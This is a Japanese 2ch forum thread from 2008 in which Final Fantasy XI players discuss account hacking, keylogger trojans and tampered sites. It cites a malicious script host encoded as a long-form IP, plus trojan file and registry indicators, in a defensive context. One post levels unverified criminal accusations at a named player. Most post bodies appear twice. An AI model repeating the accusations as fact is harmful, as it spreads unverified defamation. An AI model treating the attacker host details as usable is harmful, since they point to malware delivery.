279 :既にその名前は使われています:2008/08/08(金) 00:49:45 ID:JewjYBv1
>>276
kwsk
kwsk
280 :既にその名前は使われています:2008/08/08(金) 00:52:02 ID:cL25FzLo
>>278
何をおっしゃいますか
むしろこっちの手口の方が前は主流だったんだよ
一昔前に流行ったやつなら「2117966」とか「2117966 script」で検索すれば詳細や
感染ページが出てくる。ただし踏むときは自己責任な
何をおっしゃいますか
むしろこっちの手口の方が前は主流だったんだよ
一昔前に流行ったやつなら「2117966」とか「2117966 script」で検索すれば詳細や
感染ページが出てくる。ただし踏むときは自己責任な
281 :既にその名前は使われています:2008/08/08(金) 00:58:21 ID:To5BkrnS
Noスクリプトなどいれてセキュリティーは全てしてあった
で、挙動がおかしくなったのは昨日の夜、火狐がサイトアドバイザーがおかしいメッセ>PC再起動>深刻なダメージエラー
C:\DOCUME~1\俺のPC\LOCALS~1\Temp\WERd218.dir00\Mini080608-01.dmp
C:\DOCUME~1\俺のPC\LOCALS~1\Temp\WERd218.dir00\sysdata.xml
PC起動後FWのプログラムコントロールに見たことないns8.tmpなどが居た
ウイルススキャンは全て問題なしだがどうもおかしい
で、挙動がおかしくなったのは昨日の夜、火狐がサイトアドバイザーがおかしいメッセ>PC再起動>深刻なダメージエラー
C:\DOCUME~1\俺のPC\LOCALS~1\Temp\WERd218.dir00\Mini080608-01.dmp
C:\DOCUME~1\俺のPC\LOCALS~1\Temp\WERd218.dir00\sysdata.xml
PC起動後FWのプログラムコントロールに見たことないns8.tmpなどが居た
ウイルススキャンは全て問題なしだがどうもおかしい
282 :既にその名前は使われています:2008/08/08(金) 01:10:54 ID:dVfI4H/P
283 :既にその名前は使われています:2008/08/08(金) 01:24:01 ID:EJkan9mG
>>280
そーなのかー
>>282
いや、wikiとかの外部編集可能なサイトの改竄なら頻発してたけれど、
基本的に管理者以外いじれないタイプのサイトの改竄を聞いたのは
ヴァナモンに変なの仕込まれた以来だったからさ。
ちっとやばげだなーと
そーなのかー
>>282
いや、wikiとかの外部編集可能なサイトの改竄なら頻発してたけれど、
基本的に管理者以外いじれないタイプのサイトの改竄を聞いたのは
ヴァナモンに変なの仕込まれた以来だったからさ。
ちっとやばげだなーと
284 :既にその名前は使われています:2008/08/08(金) 01:25:03 ID:+POA1Xld
板を見てきた
> 1039045744:88/jp■js
1039045744はロングIPアドレス表記ってやつだ。
読み替えると
61.238.148.112
になり、このIPは香港(61.238.0.0/16)。
以下の参考アドレスにもあるけどIPアドレスの表記方法はブラウザ等が
対応しているかは置いておくとしても結構バリエーションがあるので
NGワード等での対応はきっついやねぇ。
参考:
http://ja.wikipedia.org/wiki/IP%E3%82%A2%E3%83%89%E3%83%AC%E3%82%B9
> 1039045744:88/jp■js
1039045744はロングIPアドレス表記ってやつだ。
読み替えると
61.238.148.112
になり、このIPは香港(61.238.0.0/16)。
以下の参考アドレスにもあるけどIPアドレスの表記方法はブラウザ等が
対応しているかは置いておくとしても結構バリエーションがあるので
NGワード等での対応はきっついやねぇ。
参考:
http://ja.wikipedia.org/wiki/IP%E3%82%A2%E3%83%89%E3%83%AC%E3%82%B9
285 :既にその名前は使われています:2008/08/08(金) 01:42:15 ID:NuROt4+G
【表題変更】<こんな感じでいいかしら
●● RMT業者の垢ハックが多発している件3○ ●●
■テンプレ = http://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
前スレ ●● RMT業者の垢ハックが多発している件35 ●●
http://changi.2ch.net/test/read.cgi/ogame/1217834363/
■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
(スクエニ公式ページトップ = ttp://www.playonline.com/ff11/index.shtml)
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり) http://ort.sakura.ne.jp/taisai/
FF11Warning(垢ハックについての対策とか詳しく載ってます) http://miku.xrea.jp/
FFIX Virus問題 まとめサイト(初心者さん向け) http://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★「巻き戻し情報」「スクエニ社に法的責任を!」や「誰が悪いかランキング」「被害者の会を作れ」は別スレでお願いします。
★別スレ ●● FF11垢ハック巻き戻し状況報告スレ ●●
http://changi.2ch.net/test/read.cgi/ogame/1216987350/
●● RMT業者の垢ハックが多発している件3○ ●●
■テンプレ = http://miku.xrea.jp/template/ (「一般テンプレ」に関してはこちらのサイトをご覧ください)
前スレ ●● RMT業者の垢ハックが多発している件35 ●●
http://changi.2ch.net/test/read.cgi/ogame/1217834363/
■リアルタイムで被害に遭われている方へ(↓でスクエニに被害報告を)
不正アクセス専用チャットサポート = ttps://secure.playonline.com/support/index.html
受付:月曜〜金曜 11:00〜19:00(土・日・祝・指定休日はお休み)
(スクエニ公式ページトップ = ttp://www.playonline.com/ff11/index.shtml)
■まとめサイト
【FF11】アカウント不正ログイン被害まとめ(過去ログあり) http://ort.sakura.ne.jp/taisai/
FF11Warning(垢ハックについての対策とか詳しく載ってます) http://miku.xrea.jp/
FFIX Virus問題 まとめサイト(初心者さん向け) http://www.eonet.ne.jp/~lunaticwaltz/notvirus_ffxi/
★「巻き戻し情報」「スクエニ社に法的責任を!」や「誰が悪いかランキング」「被害者の会を作れ」は別スレでお願いします。
★別スレ ●● FF11垢ハック巻き戻し状況報告スレ ●●
http://changi.2ch.net/test/read.cgi/ogame/1216987350/
286 :既にその名前は使われています:2008/08/08(金) 02:39:21 ID:h6XUeWyF
PG2導入したのはいいんだけど、しきりに192.168.11.255って
IPにアクセスしてるみたいなんだが、これはなんなんだろう・・・
IPにアクセスしてるみたいなんだが、これはなんなんだろう・・・
287 :既にその名前は使われています:2008/08/08(金) 02:44:09 ID:mu62A/zw
それあんたのIP
288 :既にその名前は使われています:2008/08/08(金) 02:45:36 ID:KSFXv0yS
>>286
ブロードキャストアドレスでぐぐるといいかも。
ブロードキャストアドレスでぐぐるといいかも。
289 :既にその名前は使われています:2008/08/08(金) 02:57:23 ID:LzDYeJuO
職人の庭開いたらPG2が反応しまくりなんだけど、これって真っ黒ですか?
290 :既にその名前は使われています:2008/08/08(金) 02:58:23 ID:h6XUeWyF
>>287-288
なるほど、勉強になりました。
あと、ブロックされたものでOhio State Universityて名前と
LAN University ofて名前の所からのをブロックしてたんですが、
これはわかります?
なるほど、勉強になりました。
あと、ブロックされたものでOhio State Universityて名前と
LAN University ofて名前の所からのをブロックしてたんですが、
これはわかります?
291 :既にその名前は使われています:2008/08/08(金) 03:00:04 ID:ZQwVnqzb
292 :既にその名前は使われています:2008/08/08(金) 03:03:44 ID:ZQwVnqzb
293 :既にその名前は使われています:2008/08/08(金) 03:07:19 ID:h6XUeWyF
294 :既にその名前は使われています:2008/08/08(金) 03:07:57 ID:nzBGQ2yp
PG2は単に、ブロックリスト内に載っているアドレスへのアクセスを遮断するだけで、
そのアドレスが危険かどうかは関知していない
デフォルトのリストは、P2Pソフトを使う際に企業や官公庁、著作権団体等のアクセスを遮断することを
目的に作られてるので、デフォルトのリストを使うと割と見たこともない遮断ログに出会う
中韓のリストに反応しない限り気にしなくていいよ
そのアドレスが危険かどうかは関知していない
デフォルトのリストは、P2Pソフトを使う際に企業や官公庁、著作権団体等のアクセスを遮断することを
目的に作られてるので、デフォルトのリストを使うと割と見たこともない遮断ログに出会う
中韓のリストに反応しない限り気にしなくていいよ
295 :既にその名前は使われています:2008/08/08(金) 03:12:51 ID:h6XUeWyF
296 :既にその名前は使われています:2008/08/08(金) 03:20:36 ID:O3G6Yny3
夏休みなにそれ食べられるの?
297 :既にその名前は使われています:2008/08/08(金) 03:23:01 ID:/7Af3Axz
fc2のblogをaguseしたら
Netcraft 民間企業Netcraftによるフィッシングあるいは脆弱性のブラックリスト がCoutionだった場合
あぶない?
Netcraft 民間企業Netcraftによるフィッシングあるいは脆弱性のブラックリスト がCoutionだった場合
あぶない?
298 :既にその名前は使われています:2008/08/08(金) 03:33:08 ID:/7Af3Axz
同じFC2でもblog5.fc2.com鯖では問題なし
blog118.fc2.com鯖でCAUTIONがでます
blog118.fc2.com鯖でCAUTIONがでます
299 :既にその名前は使われています:2008/08/08(金) 03:33:42 ID:ZQwVnqzb
300 :既にその名前は使われています:2008/08/08(金) 04:54:15 ID:Zm83S7t2
301 :既にその名前は使われています:2008/08/08(金) 07:00:37 ID:VunZ1AlG
polのGMチャットは公式からもやらせてほしいなー
302 :既にその名前は使われています:2008/08/08(金) 07:04:40 ID:QyE2BUYY
>>300
それは至急オプションからみ
それは至急オプションからみ
303 :既にその名前は使われています:2008/08/08(金) 10:51:28 ID:tzMX0IhN
保守
Flashplayer Ver9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
パスワード は保存しない!
Flashplayer Ver9.0.124.0にしよう!
Realplayer 使わないなら削除しよう!
WindowsUpdate 常に最新にしよう!
パスワード は保存しない!
304 :既にその名前は使われています:2008/08/08(金) 11:21:39 ID:z0dd+6Y/
973 :既にその名前は使われています :2008/08/04(月) 17:16:49 ID:j2hDP0O9
2台のPCでちょっと試したんだが・・・
メンバーパスワードとか、セキュリティ設定とかって、なんの意味もないのな。
片方のPCで上記のものを設定しても、もう片方のPCで、全く関係なくログイン可能。
POL起動直後のログイン画面でメンバーパスワードやセキュリティ設定をしても、
別の端末からは普通に入れてしまうってなんなの
2台のPCでちょっと試したんだが・・・
メンバーパスワードとか、セキュリティ設定とかって、なんの意味もないのな。
片方のPCで上記のものを設定しても、もう片方のPCで、全く関係なくログイン可能。
POL起動直後のログイン画面でメンバーパスワードやセキュリティ設定をしても、
別の端末からは普通に入れてしまうってなんなの
305 :既にその名前は使われています:2008/08/08(金) 11:36:59 ID:vhAXtfBj
当然だわなw
306 :既にその名前は使われています:2008/08/08(金) 11:50:14 ID:ZqPm0c0b
これほんと意味ないよな。
IDとパス、それと暗号コードがセットじゃなきゃ別の端末からは
ログインできない仕様だったら効果あったものを。
IDとパス、それと暗号コードがセットじゃなきゃ別の端末からは
ログインできない仕様だったら効果あったものを。
307 :既にその名前は使われています:2008/08/08(金) 11:51:55 ID:ilyPS4+r
Kujata最強のダークサイド リアル監禁王子Winoa(ヒュム♀F8)
○垢ハック
○借りパク
○リアルストーカーで警察沙汰
○リアル婦女暴行未遂)警察が関与・監視
○リアル拉致監禁未遂)警察が関与・監視
本人曰く【警察が関わろうが俺には関係ない、警察など怖くない】という発言をしている
自称イケメンらしい
口から生まれた男と言われたこともあり口先だけの約束や、その場を切り抜けるための心得は身につけている
リアルでもヴァナでも知り合いの人は気をつけられたし
http://changi.2ch.net/test/read.cgi/ogame/1218036781/l50
○垢ハック
○借りパク
○リアルストーカーで警察沙汰
○リアル婦女暴行未遂)警察が関与・監視
○リアル拉致監禁未遂)警察が関与・監視
本人曰く【警察が関わろうが俺には関係ない、警察など怖くない】という発言をしている
自称イケメンらしい
口から生まれた男と言われたこともあり口先だけの約束や、その場を切り抜けるための心得は身につけている
リアルでもヴァナでも知り合いの人は気をつけられたし
http://changi.2ch.net/test/read.cgi/ogame/1218036781/l50
308 :既にその名前は使われています:2008/08/08(金) 11:53:48 ID:9IhBSvS/
IDとパスさえあればPSからなんの問題もなく入れるしね。
309 :既にその名前は使われています:2008/08/08(金) 12:04:12 ID:VunZ1AlG
夏休みの社会人さん、厨な質問で悪いのですがどうかお答え下さい。
アカ復元の為に免許証コピーをスクエニに送るのですが
送り方って、適当な封筒に入れて送ればいいのでしょうか?
また、切手は幾らのですか?(入らなかったり?)
FAXなら楽ですが、駄目ですよね?
アカ復元の為に免許証コピーをスクエニに送るのですが
送り方って、適当な封筒に入れて送ればいいのでしょうか?
また、切手は幾らのですか?(入らなかったり?)
FAXなら楽ですが、駄目ですよね?
310 :既にその名前は使われています:2008/08/08(金) 12:09:27 ID:p/ey7si0
311 :既にその名前は使われています:2008/08/08(金) 14:05:48 ID:XeQNmm4F
312 :既にその名前は使われています:2008/08/08(金) 14:07:46 ID:XeQNmm4F
313 :既にその名前は使われています:2008/08/08(金) 14:10:07 ID:YI+ZRcZP
>>264 >>284
ttp://www.virustotal.com/analisis/db032cb7aed741937c6b5c04cfd179ff
今回はバスターのフィリピン解析チームががんばった(返事が早かった)。
ttp://www.virustotal.com/analisis/db032cb7aed741937c6b5c04cfd179ff
今回はバスターのフィリピン解析チームががんばった(返事が早かった)。
315 :既にその名前は使われています:2008/08/08(金) 14:53:10 ID:tzMX0IhN
316 :既にその名前は使われています:2008/08/08(金) 14:59:01 ID:iwPxjcrQ
夏休み前にセキュリティ対策の確認を、IPAが呼びかけ
http://internet.watch.impress.co.jp/cda/news/2008/08/08/20526.html
MS、8月13日公開の月例パッチは“緊急”7件、“重要”5件
http://internet.watch.impress.co.jp/cda/news/2008/08/08/20530.html
http://internet.watch.impress.co.jp/cda/news/2008/08/08/20526.html
MS、8月13日公開の月例パッチは“緊急”7件、“重要”5件
http://internet.watch.impress.co.jp/cda/news/2008/08/08/20530.html
317 :既にその名前は使われています:2008/08/08(金) 16:13:30 ID:cL25FzLo
200近いから啓蒙ageしとく
318 :既にその名前は使われています:2008/08/08(金) 16:48:47 ID:6vLqLZqY
>>315のサイトにある
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ Advanced\Folder\Hidden\SHOWALL CheckedValue
が存在するんだけどヤバイのかね?
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\ Advanced\Folder\Hidden\SHOWALL CheckedValue
が存在するんだけどヤバイのかね?
319 :既にその名前は使われています:2008/08/08(金) 16:52:41 ID:fANkOQNj
>>318
パス抜かれたにゃ
パス抜かれたにゃ
320 :既にその名前は使われています:2008/08/08(金) 16:56:51 ID:cL25FzLo
321 :既にその名前は使われています:2008/08/08(金) 17:23:54 ID:F774PLy4
>>208 >>272 FF11WARNING続き
帰宅したら サーバが復帰してたので(いつまで持つか不明w)
FTPも回復したのでトップと 404ページに移転告知を入れました。
これで同じ形の復旧の見通しが立ちました。
急な移転でご迷惑おかけしますがよろしくお願いいたします。
帰宅したら サーバが復帰してたので(いつまで持つか不明w)
FTPも回復したのでトップと 404ページに移転告知を入れました。
これで同じ形の復旧の見通しが立ちました。
急な移転でご迷惑おかけしますがよろしくお願いいたします。
322 :既にその名前は使われています:2008/08/08(金) 17:30:12 ID:F6GqLKES
323 :既にその名前は使われています:2008/08/08(金) 17:38:09 ID:WIv3FjaX
ちょっと調べ物してたら
biog11.cf2のサイトをひらいしてしまった・・・。
カスペが起動中だったけどなにも警告してないがスキャンしてみるよ・・・
biog11.cf2のサイトをひらいしてしまった・・・。
カスペが起動中だったけどなにも警告してないがスキャンしてみるよ・・・
324 :既にその名前は使われています:2008/08/08(金) 17:41:42 ID:cL25FzLo
325 :既にその名前は使われています:2008/08/08(金) 17:47:03 ID:WIv3FjaX
blog11.fc2だった(´・ω・`)
窓化してたのでパス抜かれたかなぁ・・・
窓化してたのでパス抜かれたかなぁ・・・
326 :既にその名前は使われています:2008/08/08(金) 17:53:00 ID:ZQwVnqzb
おいおいFC2ブログが全部危ないと思ってんの?
その騒動は春先のことで今はほぼ絶滅してるぞ。
その騒動は春先のことで今はほぼ絶滅してるぞ。
327 :既にその名前は使われています:2008/08/08(金) 17:54:44 ID:cL25FzLo
>>325
fc2=アウトと決め付けるあたりで認識がずいぶん遅れているとお見受けする。
今は広告枠を買い取ってスクリプトを仕込まれていたり、一般ページでも改竄されて
スクリプトを読み込むようにされているのが主流だよ。もちろんfc2で依然危ないところもあるだろうけど。
もしfc2で感染したとしたらウイルススキャンして出てくる類のものだと思う。早くスキャンしる。
そしてとりあえずFF以外でもPCを使う限りはもう少しFFのハック関連について勉強したほうがいいかもしれない
fc2=アウトと決め付けるあたりで認識がずいぶん遅れているとお見受けする。
今は広告枠を買い取ってスクリプトを仕込まれていたり、一般ページでも改竄されて
スクリプトを読み込むようにされているのが主流だよ。もちろんfc2で依然危ないところもあるだろうけど。
もしfc2で感染したとしたらウイルススキャンして出てくる類のものだと思う。早くスキャンしる。
そしてとりあえずFF以外でもPCを使う限りはもう少しFFのハック関連について勉強したほうがいいかもしれない
328 :既にその名前は使われています:2008/08/08(金) 17:59:28 ID:WIv3FjaX
>>327
そうなのかー。
んー広告枠云々の話は知ってるがここ見る限りだとfc2はなるべく見ないが鉄則だからさ。
それと先週リアフレが目の前で垢ハックされた現場みたのでちょっと神経質になってたのもあるかもしれん(´・ω・`)
そうなのかー。
んー広告枠云々の話は知ってるがここ見る限りだとfc2はなるべく見ないが鉄則だからさ。
それと先週リアフレが目の前で垢ハックされた現場みたのでちょっと神経質になってたのもあるかもしれん(´・ω・`)
329 :既にその名前は使われています:2008/08/08(金) 18:27:06 ID:hnpRuHsS
既出かなあ?
『Firefox』に新たな脆弱性? (インターネットコム)
ttp://news.www.infoseek.co.jp/topics/comp/n_firefox__20080808_2/story/07internetcomwe12/
詳細はまだ明らかでないが、攻撃を受けた PC のハードディスクに保存されている
任意のデータを盗まれる恐れがあるという。Radware のセキュリティ研究者 Itzik Kotler 氏は、
セキュリティ関連カンファレンス『Black Hat』で脆弱性を実証するとしている。
『Firefox』に新たな脆弱性? (インターネットコム)
ttp://news.www.infoseek.co.jp/topics/comp/n_firefox__20080808_2/story/07internetcomwe12/
詳細はまだ明らかでないが、攻撃を受けた PC のハードディスクに保存されている
任意のデータを盗まれる恐れがあるという。Radware のセキュリティ研究者 Itzik Kotler 氏は、
セキュリティ関連カンファレンス『Black Hat』で脆弱性を実証するとしている。
330 :既にその名前は使われています:2008/08/08(金) 18:30:02 ID:9gttaPc5
POL起動時にエラーがでる症状ってどんなん?
今POLインしたら通信エラーでてやりなおしたら入れたんだがこれはたまたまだよな・・・
今POLインしたら通信エラーでてやりなおしたら入れたんだがこれはたまたまだよな・・・
331 :既にその名前は使われています:2008/08/08(金) 18:35:27 ID:cL25FzLo
他に>>12の症状であてはまるものはない?
端的な話だけ聞くと割とアウアウに近いよ
端的な話だけ聞くと割とアウアウに近いよ
332 :既にその名前は使われています:2008/08/08(金) 18:42:41 ID:9gttaPc5
一応他の症状には該当しなかった
POLがたまたま重かっただけと思いたいが・・・
POLがたまたま重かっただけと思いたいが・・・
333 :既にその名前は使われています:2008/08/08(金) 19:29:43 ID:EJkan9mG
>>332
とりあえず例の症状がなんで起こるかはそれぞれ原因が違うよん
>1:Windows Updateがフリーズする。
これはトロイがWindowsUpdateの正規プロセスになりすますため。
>3:シャットダウンに時間がかかるようになった(「コンピュータの電源を切る」が表示されるまでに2分以上かかる)
>4:POLを起動するとsvshost.exeによるPOL.exe干渉警告が出る。
>5:アプリケーションの追加と削除を選択して表示されるまでに時間がかかるようになった。
このあたりもWindowsの正規プロセスへのなりすましが原因だろうね。
でもって
>2:POLを起動するとエラーが出る(2回目からは正常に起動)
こいつはトロイがPOLのクライアントに干渉するから。
つまり、Windowsのプロセスへのなりすまし以外の潜伏手段を持っていて、かつPOLへの干渉を行うタイプなら、2の症状だけが出るって可能性も充分ある。
信onで猛威を振るってるKernaeghDrv.dllの感染兆候は「頻繁にクラ落ちする」くらいしか無かったような気がするし、
一回スキャンしてみるのがいいかもねん
とりあえず例の症状がなんで起こるかはそれぞれ原因が違うよん
>1:Windows Updateがフリーズする。
これはトロイがWindowsUpdateの正規プロセスになりすますため。
>3:シャットダウンに時間がかかるようになった(「コンピュータの電源を切る」が表示されるまでに2分以上かかる)
>4:POLを起動するとsvshost.exeによるPOL.exe干渉警告が出る。
>5:アプリケーションの追加と削除を選択して表示されるまでに時間がかかるようになった。
このあたりもWindowsの正規プロセスへのなりすましが原因だろうね。
でもって
>2:POLを起動するとエラーが出る(2回目からは正常に起動)
こいつはトロイがPOLのクライアントに干渉するから。
つまり、Windowsのプロセスへのなりすまし以外の潜伏手段を持っていて、かつPOLへの干渉を行うタイプなら、2の症状だけが出るって可能性も充分ある。
信onで猛威を振るってるKernaeghDrv.dllの感染兆候は「頻繁にクラ落ちする」くらいしか無かったような気がするし、
一回スキャンしてみるのがいいかもねん
334 :既にその名前は使われています:2008/08/08(金) 19:32:18 ID:6qmxvkG+
クラ落ちってなんだ
335 :既にその名前は使われています:2008/08/08(金) 19:34:04 ID:W0MZnMot
>>330
@起動直前に小窓でエラー報告
AそのままPOL全画面andパス入力画面
Bパス打ち込んで認証画面になったら強制終了
C@のエラー報告窓がでてる
D再度POL立ち上げ。この時はエラー報告でないでそのままログイン可
確かこんな感じ
@起動直前に小窓でエラー報告
AそのままPOL全画面andパス入力画面
Bパス打ち込んで認証画面になったら強制終了
C@のエラー報告窓がでてる
D再度POL立ち上げ。この時はエラー報告でないでそのままログイン可
確かこんな感じ
336 :既にその名前は使われています:2008/08/08(金) 19:43:03 ID:EJkan9mG
信onとかで話題になってたkarnaeghdrv.dllもこいつだったみたい。
Sophosより返答。
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojkeylogkl.html
roj/KeyLog-KL drops <System>\karnaeghdrv.dll which is also detected as Troj/KeyLog-KL.
Sophosより返答。
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojkeylogkl.html
roj/KeyLog-KL drops <System>\karnaeghdrv.dll which is also detected as Troj/KeyLog-KL.
338 :既にその名前は使われています:2008/08/08(金) 19:51:22 ID:9gttaPc5
Avastで全域スキャンしたらラグナロクオンラインのフォルダからWin32:Trojan-gen{other}が検出されたんだけど誤検出だよなコレ
339 :既にその名前は使われています:2008/08/08(金) 19:52:33 ID:ZQwVnqzb
誤検知じゃね? VirusTotalに投げてみたら?
続きはLiveROのスレでやってくれ。
続きはLiveROのスレでやってくれ。
カスペで完全スキャンしたら1つ発見された・・・。
files\live2ch\log\anime3.2ch.net\ranime\1161951707.dat
上のなんだけどねぇ。
一応削除したがちょっとショック(´・ω・`)
files\live2ch\log\anime3.2ch.net\ranime\1161951707.dat
上のなんだけどねぇ。
一応削除したがちょっとショック(´・ω・`)
341 :既にその名前は使われています:2008/08/08(金) 20:22:50 ID:cL25FzLo
>>340
どうみても専ブラのログです
どうみても専ブラのログです
342 :既にその名前は使われています:2008/08/08(金) 20:23:55 ID:6qmxvkG+
ばかすぎワロタ
343 :既にその名前は使われています:2008/08/08(金) 20:32:50 ID:WIv3FjaX
344 :既にその名前は使われています:2008/08/08(金) 20:37:38 ID:27nY5vHv
ワロスwwwwwwwwwwwww
345 :既にその名前は使われています:2008/08/08(金) 20:42:27 ID:cL25FzLo
ごめんねdat番号で何のスレかまで調べてごめんね
あんみつ姫
で、一応そのスレざっと覗いてきたけど、19にウイルスコードが貼られてるだけですね
ノートンを誤作動させるやつだと思う
あんみつ姫
で、一応そのスレざっと覗いてきたけど、19にウイルスコードが貼られてるだけですね
ノートンを誤作動させるやつだと思う
346 :既にその名前は使われています:2008/08/08(金) 20:54:09 ID:h56cXdZu
一度垢ハックされたからウイルスソフトでスキャンしたら
ワームとトロイの木馬が検出されたんだけど
駆除したらFFXIにもう影響ないかな…
それとももっとほかに気をつけないといけないウイルスってある?
俺のは、カスタムPCでリカバリソフトが付いてなくて初期化ができないから
どうにかしてウイルスを取り除きたいんだけど…
やっぱり新しいPC買わなくちゃ駄目なのかな?;
ワームとトロイの木馬が検出されたんだけど
駆除したらFFXIにもう影響ないかな…
それとももっとほかに気をつけないといけないウイルスってある?
俺のは、カスタムPCでリカバリソフトが付いてなくて初期化ができないから
どうにかしてウイルスを取り除きたいんだけど…
やっぱり新しいPC買わなくちゃ駄目なのかな?;
347 :既にその名前は使われています:2008/08/08(金) 21:05:12 ID:cL25FzLo
>>346
もちろん新しいPCを導入したとしても対策を施さないと無意味どすえ。
あと、そのレスだけではどのウイルスに感染したか分からないしどのソフトで駆除したかも分からないから
「駆除したんだから大丈夫だね^^」と言うことはできない。
基本的にウイルス駆除に責任と自信をもてない人はクリーンインスコを推奨される。
346の場合は新PCかなぁ。自作や組み立てができるなら安く買えるよ。
一旦盗難被害にあった家で、壊された鍵や窓は修理したけど、まだどこかに泥棒が次に入るための
手引きに使うために残したものがあるかもしれない。箪笥や引き出しを引っ掻き回されたままかもしれない。
みたいな状況だからね。まっさらの家に引っ越すか、一旦徹底的に内装を引っぺがして最初から部屋を作り変える
ことをお勧めしたいわけだ
もちろん新しいPCを導入したとしても対策を施さないと無意味どすえ。
あと、そのレスだけではどのウイルスに感染したか分からないしどのソフトで駆除したかも分からないから
「駆除したんだから大丈夫だね^^」と言うことはできない。
基本的にウイルス駆除に責任と自信をもてない人はクリーンインスコを推奨される。
346の場合は新PCかなぁ。自作や組み立てができるなら安く買えるよ。
一旦盗難被害にあった家で、壊された鍵や窓は修理したけど、まだどこかに泥棒が次に入るための
手引きに使うために残したものがあるかもしれない。箪笥や引き出しを引っ掻き回されたままかもしれない。
みたいな状況だからね。まっさらの家に引っ越すか、一旦徹底的に内装を引っぺがして最初から部屋を作り変える
ことをお勧めしたいわけだ
348 :既にその名前は使われています:2008/08/08(金) 21:23:14 ID:h56cXdZu
>>347
そうなのか〜…
俺はカスタムPCには詳しくないから
新しく買うとなったら結構かかっちまうけど;
安心してFFするには、やっぱり買い換えるほうがいいんだな
ウイルスの種類はいますぐには分からないけど
分かったときにまた報告にきますm(_ _)m
どうもありがとう
そうなのか〜…
俺はカスタムPCには詳しくないから
新しく買うとなったら結構かかっちまうけど;
安心してFFするには、やっぱり買い換えるほうがいいんだな
ウイルスの種類はいますぐには分からないけど
分かったときにまた報告にきますm(_ _)m
どうもありがとう
349 :既にその名前は使われています:2008/08/08(金) 21:46:11 ID:hisDtxI0
それくらいわかってるふふん
350 :既にその名前は使われています:2008/08/08(金) 22:03:10 ID:FgINz74r
竹本泉のあんみつ姫完全版を買ったばかりの俺が何故かPOP
351 :既にその名前は使われています:2008/08/08(金) 22:05:22 ID:fC70tzdG
あんみつ姫懐かしすぎ。
葬式と座布団、そして押し入れに葬式まんじゅうを思い出すな。
葬式と座布団、そして押し入れに葬式まんじゅうを思い出すな。
352 :既にその名前は使われています:2008/08/08(金) 22:10:29 ID:nzBGQ2yp
竹本版はオリジナルとは違う独自の設定だぜ
完全版なんて出てたのか
完全版なんて出てたのか
353 :既にその名前は使われています:2008/08/08(金) 22:55:15 ID:FgINz74r
完全版はカバー書き下ろしとカラーページの再録、あとがき2ページ追加かな。
講談社版はあとがき自体無かったけど、
宙出版版のあとがきは残ってるので、あとがき好きにはたまりません。
引き続き垢ハックにご注意をの話題再開
↓↓↓↓↓↓↓↓↓↓
講談社版はあとがき自体無かったけど、
宙出版版のあとがきは残ってるので、あとがき好きにはたまりません。
引き続き垢ハックにご注意をの話題再開
↓↓↓↓↓↓↓↓↓↓
354 :既にその名前は使われています:2008/08/09(土) 00:08:00 ID:vYdvifQl
>>346 カスタムPCだからリカバリがないって
赤っぽいきらきらしたwindowsって言うOSのディスクはないのか?
マザボのドライバディスクはないのか?
割れとかテスト用ってOSそのまま使ってたのか?
>>309にも驚いたけど こんなん相手にしてたサポセンに同情したくなる。
赤っぽいきらきらしたwindowsって言うOSのディスクはないのか?
マザボのドライバディスクはないのか?
割れとかテスト用ってOSそのまま使ってたのか?
>>309にも驚いたけど こんなん相手にしてたサポセンに同情したくなる。
355 :既にその名前は使われています:2008/08/09(土) 00:13:11 ID:91TUl4XL
>>346
ウィンドーズだけ購入する事も可能。ただし、アップグレードを購入すると
前のディスクが無いので困った事になるから正規品を買うしか無い。
一応OMEバージョンとかに良くあるi386フォルダがHDにあるなら
それからディスクを作る事も可能。ただし素人にはおすすめできない。
クリーンインストールする場合はハード関係のドライバ類もきっちりメモしておくこと。
これだけの手間を考えると素直にPS2か新しいPC買ったほうが楽
かもしれない。
ウィンドーズだけ購入する事も可能。ただし、アップグレードを購入すると
前のディスクが無いので困った事になるから正規品を買うしか無い。
一応OMEバージョンとかに良くあるi386フォルダがHDにあるなら
それからディスクを作る事も可能。ただし素人にはおすすめできない。
クリーンインストールする場合はハード関係のドライバ類もきっちりメモしておくこと。
これだけの手間を考えると素直にPS2か新しいPC買ったほうが楽
かもしれない。
356 :既にその名前は使われています:2008/08/09(土) 00:17:54 ID:91TUl4XL
>>354
最近のPCは安くしてるのでリカバリーディスクは別途注文
しないといけない。特に○ELLは数年前からリカバリーは
ハードディスクの別のパーティションに入れてあって、
購入後にハードディスク全部をバックアップしろと言ってる。
最近のPCは安くしてるのでリカバリーディスクは別途注文
しないといけない。特に○ELLは数年前からリカバリーは
ハードディスクの別のパーティションに入れてあって、
購入後にハードディスク全部をバックアップしろと言ってる。
357 :既にその名前は使われています:2008/08/09(土) 00:20:10 ID:M5O/nIrB
最近のはリカバリ領域だけで、メディアは自分で作成or有料で購入になってるな。
358 :既にその名前は使われています:2008/08/09(土) 00:29:57 ID:GVH6oeQR
PG2機能してるか確かめたくて
Wikipediaみてみたんだけど普通に見れた
wikipediaって韓国にサーバーあるんじゃなかったっけ?
PG2が特に反応無しで開けてしまってびっくらこいたw
Wikipediaみてみたんだけど普通に見れた
wikipediaって韓国にサーバーあるんじゃなかったっけ?
PG2が特に反応無しで開けてしまってびっくらこいたw
359 :既にその名前は使われています:2008/08/09(土) 00:31:05 ID:SWZ6C4bE
360 :既にその名前は使われています:2008/08/09(土) 00:31:23 ID:MQSXsGHk
>>358
過去スレぐらい嫁
過去スレぐらい嫁
361 :既にその名前は使われています:2008/08/09(土) 00:49:15 ID:I+oAOFKS
FF11・マップガイドっていう地図サイトを開こうとしたら画面真っ白で
ん?って感じですぐにはピンときませんでしたが案の定PG2が点滅。
サイトじたいは少しあとで開けましたがPG2のログには送信を61.238.148.112.88で
遮断してました。
過去レスで同じIPの話が出てましたけど、改竄攻撃再来でしょうか・・・
ん?って感じですぐにはピンときませんでしたが案の定PG2が点滅。
